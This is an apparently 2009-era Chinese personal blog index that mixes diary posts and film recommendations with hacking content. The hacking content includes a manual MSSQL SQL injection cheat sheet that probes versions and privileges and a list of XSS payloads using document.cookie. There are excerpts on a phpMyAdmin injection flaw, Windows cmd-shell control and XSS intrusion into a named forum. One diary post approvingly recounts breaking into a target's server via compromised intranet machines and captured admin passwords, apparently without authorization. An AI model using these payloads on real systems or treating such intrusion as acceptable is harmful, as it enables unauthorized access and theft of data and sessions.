天赐And物语

文章列表

手工SQL注入语句(老东西放上来怕忘哈)

2009-09-01 17:33

and exists (select * from sysobjects) //判断是否是MSSQL

and exists(select * from tableName) //判断某表是否存在..tableName为表名

and 1=(select @@VERSION) //MSSQL版本

And 1=(select db_name()) //当前数据库名

and 1=(select @@servername) //本地服务名

and 1=(select IS_SRVROLEMEMBER('sysadmin')) //判断是否是系统管理员

and 1=(Select IS_MEMBER('db_owner')) //判断是否是库权限

and 1= (Select HAS_DBACCESS('master')) //判断是否有库读取权限

and

阅读全文>>

类别：技术文档 | 评论(0) | 浏览()

休养生息

2009-07-05 17:33

最近很少上网,平时看看书,打打篮球,休养身体,感觉生活就应该这样有规律有目的,要不就不叫生活,那叫生存了.

下面的目的是:

1.把身体养好

2.把书看完多学点东西丰富下自己

3.向目标努力

类别：心情日记 | 评论(0) | 浏览()

推荐几部电影

2009-04-29 23:32

首先是很黄很暴力的：

怒火攻心1 2

然后是搞笑的：

超时空要爱(梁朝伟 98年作品很高)

最后动作片：

经典的黄飞鸿之龙城奷霸，貌似新出的。

还有刑杀之法，好像也是新出的哈。

类别：休闲娱乐 | 评论(2) | 浏览()

7分钟和网友见面的方法---QQ聊天记录

2009-04-27 22:45

阅读全文>>

类别：休闲娱乐 | 评论(0) | 浏览()

phpMyAdmin 3.1.0 sql注射漏洞

2009-03-27 21:44

受影响系统：

phpMyAdmin phpMyAdmin 3.x
phpMyAdmin phpMyAdmin 2.11.x
不受影响系统：

phpMyAdmin phpMyAdmin 3.1.1.0
phpMyAdmin phpMyAdmin 2.11.9.4
描述：

--------------------------------------------------------------------------------

BUGTRAQ ID: 32720

phpMyAdmin是用PHP编写的工具，用于通过WEB管理MySQL。

phpMyAdmin的./phpmyadmin/libraries/db_table_exists.lib.php文件中没有正确地过滤table参数：

阅读全文>>

类别：技术文档 | 评论(2) | 浏览()

转个文章好像是以前红盟的写的老文章比较实用哈

2009-03-14 17:57

Cmd Shell(命令行交互)是黑客永恒的话题，它历史悠久并且长盛不衰。本文旨在介绍和总结一些在命令行下控制Windows系统的方法。这些方法都是尽可能地利用系统自带的工具实现的。

文件传输
对于溢出漏洞获得的cmd shell，最大的问题就是如何上传文件。由于蠕虫病毒流行，连接ipc$所需要的139或445端口被路由封锁。再加上WinXP系统加强了对ipc$的保护，通过ipc$及默认共享上传文件的手段基本无效了。ftp和tftp是两种可行的方法，介于其已被大家熟知，本文就不介绍了。还有三种大家熟悉的办法，作为总结我再提一下：

阅读全文>>

类别：技术文档 | 评论(0) | 浏览()

利用XSS渗透DISCUZ 6.1.0实战

2009-03-14 17:39

信息来源：邪恶八进制信息安全团队（www.eviloctal.com）
文章作者：eaglet

网上关于XSS入侵网站的例子很多，但是大多都是一些恶作剧性质的介绍.下面本人来亲自介绍下利用脚本入侵国内某安全论坛的过程
就像主题所说一样，今天测试的论坛是DISCUZ！ 6.1.0

目标：卡巴技术论坛

阅读全文>>

类别：技术文档 | 评论(0) | 浏览()

恼火(结束,搞定了哈)

2009-03-08 15:06

最近搞个破站,硬是没搞进去,拿了几台内网机器(还好目标和拿下的几台机器在同一个VLAN里),可是就是搞不到事没啥思路了.嗅吧嗅不到什么东西,管理员密码搞到了可是和目标站没啥联系哎,哪位大牛提供个思路.

顺便祝各位妇女,三八节快乐哈.

想去锻炼下身体,也不知道去哪锻炼,身边的朋友不是离的远就是在外地哎,郁闷.

哈搞定了,昨天没事的时候上去内网看了一下收集的信息,利用收集到的信息成功的拿到了目标的服务器.

类别：心情日记 | 评论(0) | 浏览()

XSS测试语句大全

2009-02-11 14:47

><script>alert(document.cookie)</script>
='><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert('XSS')%3C/script%3E
<script>alert('XSS')</script>
<img src="javascript:alert('XSS')">
%0a%0a<script>alert(\"Vulnerable\")</script>.jsp
%22%3cscript%3e

阅读全文>>

类别：技术文档 | 评论(0) | 浏览()

贰零零玖新年新气象

2009-02-10 09:25

这中国最大的节日春节,总算是过完了,这也代表着春天要来了,春天万物复苏,我也要苏醒过来,努力加油了哈.

祝:兄弟们不管远的近的,老的少的,认识和不认识的(哈哈),牛年都牛起来.

类别：休闲娱乐 | 评论(2) | 浏览()